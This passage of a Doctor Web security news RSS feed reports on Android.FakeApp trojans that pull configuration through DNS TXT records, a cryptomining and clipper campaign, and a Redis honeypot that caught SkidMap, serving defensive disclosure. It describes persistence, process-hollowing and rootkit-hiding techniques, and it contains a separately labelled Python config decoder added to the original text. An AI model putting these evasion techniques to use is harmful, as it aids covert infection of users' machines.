      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Settings stored on GitLab and in a security blog. Curiously, in the latter case, the hacker asks for help decrypting third-party code. The code will later be sent to the trojan as an argument for one of the commands.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Another feature of this campaign is that the trojan is starting to be adapted for later use as a component for a post-exploitation framework, which is a suite of software used after a computer has been accessed. Such frameworks are not inherently illegal; they are used by companies that officially provide security-audit services. The most popular tools are Cobalt Strike and Metasploit, which allow a large number of checks to be automated and have a built-in vulnerability database.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;An example of a network map created by Cobalt Strike (source: official website)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Of course, such capabilities are highly sought after by threat actors. In 2022, a cracked version of Cobalt Strike became available to a wide audience, leading to a surge in hacker activity. Geographically, the Cobalt Strike infrastructure has a significant presence in China. It is worth noting that the developer aims to track all Cobalt Strike installations, and servers with cracked versions are routinely shut down by law enforcement. Therefore, hackers are steadily trending towards using open-source frameworks that support extensions out of the box and are able to modify the network communication between the infected host and its control server. They prefer this strategy as it does not draw additional attention to their infrastructure.&lt;/p&gt;

&lt;p&gt;As a result of the investigation, our analysts added all identified threats to our malware databases and incorporated additional heuristic rules to ensure that malicious eBPF programs are recognized.&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen28.58279&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen28.58279&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Siggen28.58279" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14935&amp;lng=en</guid><title>Malicious apps on Google Play: how threat actors use the DNS protocol to covertly connect trojans to C&amp;C servers</title><link>https://news.drweb.com/show/?i=14935&amp;lng=en&amp;c=23</link><pubDate>Mon, 11 Nov 2024 13:44:17 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;November 11, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Many Android.FakeApp trojans are tasked with opening links to various sites, and from a technical point of view, such malware programs are quite primitive. When launched, they receive a command to load a specific web address. As a result, the users who have installed them see the contents of some unwanted site on their screens instead of the program or game they are expecting. However, sometimes notable samples can emerge among such fake applications: Android.FakeApp.1669, for example. It differs from most of the threats that are similar to it in that it uses a modified dnsjava library to get the configuration from a malicious DNS server that contains the target link. At the same time, such a configuration is sent to the trojan only when it is connected to the Internet via certain service providers—mobile Internet providers, for example. In other cases, the trojan does not manifest itself in any way.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; is represented by a large number of modifications that are disguised as various programs on distribution sources that include Google Play. For instance, the currently known trojan variants have been downloaded from the official Android OS digital store at least 2,160,000 times.&lt;/p&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/01_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/01_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/02_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/02_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/03_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/03_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/04_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/04_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p class="alignCenter"&gt;&lt;em&gt;Examples of the programs in which &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; was hidden&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Below is the list of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; variants that Doctor Web’s malware analysts discovered on Google Play. Our experts detected more trojans, but some of them are no longer in this app store.&lt;/p&gt;

&lt;table class="Table" style="width: 60%;"&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;App name&lt;/th&gt;
      &lt;th&gt;Number of downloads&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;&lt;td&gt;Split it: Checks and Tips&lt;/td&gt;&lt;td&gt;1,000,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;FlashPage parser&lt;/td&gt;&lt;td&gt;500,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;BeYummy - your cookbook&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Memogen&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Display Moving Message&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;WordCount&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Goal Achievement Planner&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;DualText Compare&lt;/td&gt;&lt;td&gt;100,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Travel Memo&lt;/td&gt;&lt;td&gt;100,000+ (since removed)&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;DessertDreams Recipes&lt;/td&gt;&lt;td&gt;50,000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Score Time&lt;/td&gt;&lt;td&gt;10,000+&lt;/td&gt;&lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;When launched, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; sends a DNS request to its C&amp;C server to receive the TXT record associated with the name of a target domain. In turn, the server gives this record to the trojan only if the infected device is connected to the Internet via target providers, which include mobile Internet providers. Such TXT records usually contain domain data and some additional technical information, but in the case of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, the malware’s configuration is encoded into it.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; uses modified code from the open-source dnsjava library to send DNS requests.
&lt;/blockquote&gt;

&lt;p&gt;All trojan modifications are tied to specific domain names, which allows the DNS server to send each of them their own configuration. Moreover, the sub-domain names of these target domains are unique to each infected device. They contain encoded data about the device, including sensitive information:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;device model and brand;&lt;/li&gt;
  &lt;li&gt;screen size;&lt;/li&gt;
  &lt;li&gt;ID (it consists of two numbers: the first is the malware’s installation time, and the second is a random number);&lt;/li&gt;
  &lt;li&gt;whether the device’s battery is charging and its current charge percentage;&lt;/li&gt;
  &lt;li&gt;whether the developer settings are enabled.  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For example, when analyzed, the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; variant hidden in the &lt;em&gt;Goal Achievement Planner&lt;/em&gt; program requested the server to send it the TXT record for the domain &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com.&lt;/span&gt;; the variant from the &lt;em&gt;Split it: Checks and Tips&lt;/em&gt; program requested the record for the domain &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital.&lt;/span&gt;, and the variant from the &lt;em&gt;DessertDreams Recipes&lt;/em&gt; app requested the record for the domain &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com.&lt;/span&gt;.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/05_c2_response.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/05_c2_response.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;An example of a target domain’s TXT record, which was sent by the DNS server upon request via the Linux ‘dig’ tool when one of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; modifications was undergoing analysis&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The contents of these TXT records can be decoded by doing the following:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;reversing the string;&lt;/li&gt;
  &lt;li&gt;decoding the Base64 data;&lt;/li&gt;
  &lt;li&gt;decompressing the gzip data;&lt;/li&gt;
  &lt;li&gt;splitting it into lines by the character &lt;span class="string"&gt;÷&lt;/span&gt;.  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The resulting data will look like this (the example below relates to the TXT record for the &lt;em&gt;Goal Achievement Planner&lt;/em&gt; app):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;
url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954
&lt;/code&gt;&lt;/pre&gt;
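&lt;p&gt;Added example (not code from the Doctor Web write-up or from the trojan itself): a Python decoder that applies the four steps above to a TXT record and pairs the resulting lines into keys and values. The sample record is constructed here from the configuration shown above; the helper names and the joining of multi-string TXT answers are assumptions of this example.&lt;/p&gt;

```python
import base64
import gzip

# Constructed sample: the configuration printed above for the
# "Goal Achievement Planner" variant, used to build a test record offline.
SAMPLE_CONFIG = {
    "url": "hxxps[:]//goalachievplan[.]pro",
    "af_id": "DF3DgrCPUNxkkx7eiStQ6E",
    "os_id": "f109ec36-c6a8-481c-a8ff-3ac6b6131954",
}

# Line separator used inside the decompressed data, as described in the write-up.
SEPARATOR = "÷"


def build_sample_record(config):
    """Constructed helper (assumption): produce a TXT record in the described
    format (÷-joined key/value lines, gzip, Base64, reversed) so the decoder
    can be exercised without querying any DNS server."""
    lines = []
    for key, value in config.items():
        lines.append(key)
        lines.append(value)
    plain = SEPARATOR.join(lines).encode("utf-8")
    packed = base64.b64encode(gzip.compress(plain)).decode("ascii")
    return packed[::-1]


def decode_txt_record(record):
    """Undo the four-step transform from the write-up and return the
    configuration as a dict (keys and values alternate in the data)."""
    if isinstance(record, (list, tuple)):
        # Assumption: a long TXT answer arrives as several character-strings
        # (DNS limits each to 255 bytes); they are joined before decoding.
        record = "".join(record)
    # Tolerate the quoting that tools such as dig print around TXT data.
    record = record.strip().strip('"')
    reversed_back = record[::-1]                       # step 1: reverse
    raw = base64.b64decode(reversed_back, validate=True)  # step 2: Base64
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("decoded data is not gzip; not this config format")
    text = gzip.decompress(raw).decode("utf-8")       # step 3: gunzip
    fields = text.split(SEPARATOR)                     # step 4: split on ÷
    if len(fields) % 2 != 0:
        raise ValueError("odd number of fields: %d" % len(fields))
    return dict(zip(fields[0::2], fields[1::2]))


def extract_landing_url(config):
    """Defender view: the 'url' key is the page the trojan loads in WebView,
    i.e. the indicator worth blocking; returns None if the key is absent."""
    return config.get("url")


if __name__ == "__main__":
    sample = build_sample_record(SAMPLE_CONFIG)
    print("constructed TXT record:", sample)
    decoded = decode_txt_record(sample)
    for key, value in decoded.items():
        print(key, "=", value)
    print("landing URL to block:", extract_landing_url(decoded))
```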

&lt;p&gt;This data contains the link that the trojan loads in WebView inside its window over its main interface. This link leads to the website that starts a long chain of redirects, at the end of which is an online casino site. As a result, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; literally transforms into a web application that displays the contents of the loaded website and not the functionality declared on the app’s page on Google Play.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/06_Android.FakeApp.1669_website.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/06_Android.FakeApp.1669_website.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Instead of providing the expected functionality, the malicious program displayed the contents of a loaded online casino website&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;At the same time, when the trojan has Internet access via non-targeted service providers (and also when offline), it operates as the advertised program—provided that the creators of a particular malware modification implemented some functionality for such a case.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/07_Android.FakeApp.1669_normal.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/07_Android.FakeApp.1669_normal.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;The trojan did not receive a configuration from the C&amp;C server and launched as a normal app&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices successfully detects and deletes all known &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; modifications, so this trojan does not pose a threat to our users.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.FakeApp.1669/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14920&amp;lng=en</guid><title>Hidden cryptocurrency mining and theft campaign affected over 28,000 users</title><link>https://news.drweb.com/show/?i=14920&amp;lng=en&amp;c=23</link><pubDate>Tue, 08 Oct 2024 14:47:30 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 8, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Virus analysts at Doctor Web have identified a large-scale campaign aimed at spreading cryptomining and cryptostealing malware by delivering trojans to victims' computers under the guise of office programs, game cheats, and online trading bots.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;During routine analysis of cloud telemetry submitted by our users, specialists at the Doctor Web virus lab detected suspicious activity of a program disguised as a Windows component (&lt;span class="string"&gt;StartMenuExperienceHost.exe&lt;/span&gt;; the legitimate process with this name is responsible for managing the Start menu). This program communicated with a remote network host and waited for an incoming connection, upon which it immediately launched the &lt;span class="string"&gt;cmd.exe&lt;/span&gt; command line interpreter.&lt;/p&gt;
&lt;p&gt;Disguised as a system component was the Ncat network utility, which, when used for legitimate purposes, transfers data over the network via the command line. This discovery helped reconstruct a sequence of security events, including attempts to infect computers with malware, which were prevented by Dr.Web.&lt;/p&gt;
 
&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/1.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/1.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;  
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/2.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/2.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/3.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/3.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;The source of infection is fraudulent pages created by attackers on GitHub (note that such activity is prohibited by the platform's rules) or YouTube pages containing malware links in the description below the video. By clicking on the link, the victim downloads a self-extracting, password-protected archive. Because the archive is encrypted, it cannot be automatically scanned by antivirus software. Once the victim enters the password that the hackers provide on the download page, the following temporary files are extracted to the &lt;span class="string"&gt;%ALLUSERSPROFILE%\jedist&lt;/span&gt; folder on the victim's computer:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;UnRar.exe&lt;/span&gt; - an application for extracting RAR archives;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;WaR.rar&lt;/span&gt; - a RAR archive;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Iun.bat&lt;/span&gt; - a script that creates a task to run the Uun.bat script, then initiates a computer restart, and deletes itself;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Uun.bat&lt;/span&gt; - an obfuscated script that extracts &lt;span class="string"&gt;WaR.rar&lt;/span&gt;, runs the &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; and &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; files it contains, and then deletes the task created by &lt;span class="string"&gt;Iun.bat&lt;/span&gt; and the &lt;span class="string"&gt;jedist&lt;/span&gt; folder along with its contents.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; file is an AutoIt language interpreter and is not malicious in and of itself. However, this is not its true name. Attackers have renamed it from &lt;span class="string"&gt;AutoIt3.exe&lt;/span&gt; to &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; to disguise it as the WinRAR library that integrates archiver functionality into the Windows right-click menu. Once launched, the interpreter in turn loads the &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file, which the cybercriminals borrowed from the Uninstall Tool utility. Perfectly legitimate in its own right, it even carries a valid digital signature, but it has a malicious AutoIt script attached to it. Once executed, the script unpacks its payload, which consists of a series of heavily obfuscated files.&lt;/p&gt;

&lt;blockquote&gt;
  AutoIt is a programming language for creating automation scripts and utilities for Windows. Its ease of use and broad functionality have made it popular with various categories of users, including malware writers. Some antivirus programs detect all compiled AutoIt scripts as malicious.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file performs the following actions:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Scans the process list for running debugging software. The script contains the names of about 50 different debugging utilities, and if at least one process from this list is detected, the script terminates.&lt;/li&gt;
  &lt;li&gt;If no debugging software is found, the files needed to continue the attack are extracted on the compromised system. Some of these files are “clean” and are needed only to implement network communication, while the rest perform malicious actions.&lt;/li&gt;
  &lt;li&gt;Creates system events to gain network access using Ncat and to execute BAT and DLL files, and modifies the registry to gain persistence using the IFEO technique.
    &lt;blockquote&gt;
      Image File Execution Options (IFEO) is a feature that Windows makes available to software developers. For example, it allows them to automatically launch a debugger when an application starts. However, attackers can use the IFEO technique to gain a foothold in the system. They accomplish this by swapping the path to the debugger with the path to the malicious file, so that every time a legitimate application is launched, the malicious application is started as well. In this case, the hackers "hijacked" Windows system services, as well as the Google Chrome and Microsoft Edge update processes (&lt;span class="string"&gt;MoUsoCoreWorker.exe&lt;/span&gt;, &lt;span class="string"&gt;svchost.exe&lt;/span&gt;, &lt;span class="string"&gt;TrustedInstaller.exe&lt;/span&gt;, &lt;span class="string"&gt;GoogleUpdate.exe&lt;/span&gt; and &lt;span class="string"&gt;MicrosoftEdgeUpdate.exe&lt;/span&gt;).
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Revokes the delete and modify permissions for the folders and files created in step 2.&lt;/li&gt;
  &lt;li&gt;Disables the Windows Recovery Service.&lt;/li&gt;
  &lt;li&gt;Sends the specifications of the compromised computer, its name, operating system version and information about the installed antivirus software to the attackers using a Telegram bot.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;span class="string"&gt;DeviceId.dll&lt;/span&gt; and &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; files perform hidden cryptomining and cryptostealing functions, respectively. Both files inject their payload into the &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Windows Explorer) process using the Process Hollowing technique. The first file is a legitimate library distributed as part of the .NET framework that has a malicious AutoIt script embedded that executes the &lt;a href="https://vms.drweb.com/search/?q=SilentCryptoMiner&amp;lng=en"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt; miner. This miner has extensive configuration and stealth capabilities for cryptocurrency mining, as well as remote control functionality.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; library, which again is a legitimate library of the 7-Zip archiver, contains a clipper. This type of malware is used to monitor data in the clipboard, which it can either spoof or pass on to attackers. In this case, the clipper waits for typical strings in the clipboard that are characteristic of wallet addresses and replaces them with those specified by the attackers. At the time of publication, it is confirmed that only thanks to the clipper hackers were able to get hold of more than 6000 dollars worth of cryptocurrency.&lt;/p&gt;

&lt;blockquote&gt;
  The Process Hollowing technique consists of running a trusted process in a suspended state, overwriting its code in memory with malicious code, and then resuming the process execution. Because the technique spawns additional instances of the trusted process, several copies of the process with the same name appear; in our case, three &lt;span class="string"&gt;explorer.exe&lt;/span&gt; processes were observed on the victims' machines, which is suspicious in itself, since this process normally runs as a single instance.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia. Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. Since the victims' computers were compromised by installing pirated versions of popular programs, the main recommendations for preventing such incidents are to download software only from official sources, to use open-source alternatives, and to install capable antivirus software. Users of Dr.Web products are not affected by this threat.&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.1443&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.1443&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Metack/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14918&amp;lng=en</guid><title>Redis honeypot: server with vulnerable Redis database reveals new SkidMap modification used to hide cryptocurrency mining process</title><link>https://news.drweb.com/show/?i=14918&amp;lng=en&amp;c=23</link><pubDate>Thu, 03 Oct 2024 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 3, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web virus analysts have identified a new rootkit modification that installs the Skidmap mining trojan on compromised Linux machines. This rootkit is designed as a malicious kernel module that hides the miner’s activity by providing fake information about CPU usage and network activity. This attack appears to be indiscriminate, primarily targeting the enterprise sector—large servers and cloud environments—where mining efficiency can be maximized.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Redis database management system is the world’s most popular NoSQL database: Redis servers are used by large companies such as X (formerly Twitter), Airbnb, Amazon and others. Its advantages are obvious: maximum performance, a tiny memory footprint, and support for various data types and programming languages. However, this product also has some downsides: since Redis was never intended to be exposed at the network’s edge, its default configuration offers only basic security features, and no access-control or encryption mechanisms existed prior to version 6. In addition, cybersecurity publications report numerous Redis vulnerabilities each year. In 2023, for example, there were 12 vulnerabilities, three of which had a “Serious” status. The growing number of reports of compromised servers and the subsequent installation of mining programs sparked the interest of Doctor Web's virus lab staff, who wanted to experience the attack firsthand. For this purpose, they decided to set up their own unprotected Redis server and wait for uninvited guests. The server was active for a year, and during that time it was attacked about 10–14 thousand times a month. Recently, the server was hit with a modification of the SkidMap trojan, as our analysts expected. What came as a surprise, however, was that the cybercriminals used a new method to hide the miner's activity and installed four backdoors at the same time.&lt;/p&gt;

&lt;p&gt;The Skidmap trojan first made headlines in 2019. This trojan-miner is specialized and mainly targets enterprise networks since the greatest stealth mining profits can be achieved in the corporate segment. Despite the fact that five years have passed since the trojan’s debut, the principle of its operation remains unchanged: the trojan is installed on a system by exploiting vulnerabilities or through misconfigured software. In the case of our honeypot server, the hackers added tasks to the system scheduler in which a script downloaded the &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt; dropper (or its other modification, &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;) every 10 minutes. This executable checks the OS kernel version, disables the SELinux security module, and then unpacks the &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt; rootkit, the &lt;a href="https://vms.drweb.com/search/?q=Linux.BtcMine.815&amp;lng=en"&gt;&lt;b&gt;Linux.BtcMine.815&lt;/b&gt;&lt;/a&gt; miner, and the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.Pam.8&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.Pam.8&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/9&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.SSH.425&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.SSH.425&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/426&lt;/b&gt; backdoors on the system. The dropper is remarkable in that it is quite large, as it packs about 60 executables for various Linux distributions. In this case, the dropper contained the files for various versions of Debian and Red Hat Enterprise Linux distributions, which are most commonly encountered on servers.&lt;/p&gt;

&lt;p&gt;Once installed, the rootkit intercepts a number of system calls, allowing it to generate fake information in response to diagnostic commands entered by an administrator. Intercepted functions include those that report average CPU usage, network activity on a number of ports, and lists of files in directories. The rootkit also checks all kernel modules when they are loaded and prevents those that can detect its presence from running. All this allows it to thoroughly hide all aspects of the miner's cryptocurrency mining activity: computation, sending hashes, and receiving jobs.&lt;/p&gt;

&lt;p&gt;The purpose of the four backdoors installed by the dropper as part of this attack is to collect SSH credentials from a compromised machine and send them to the attackers and to create a master password for all accounts on the system. Note that all passwords are additionally encrypted using the Caesar cipher with a 4-letter offset.&lt;/p&gt;

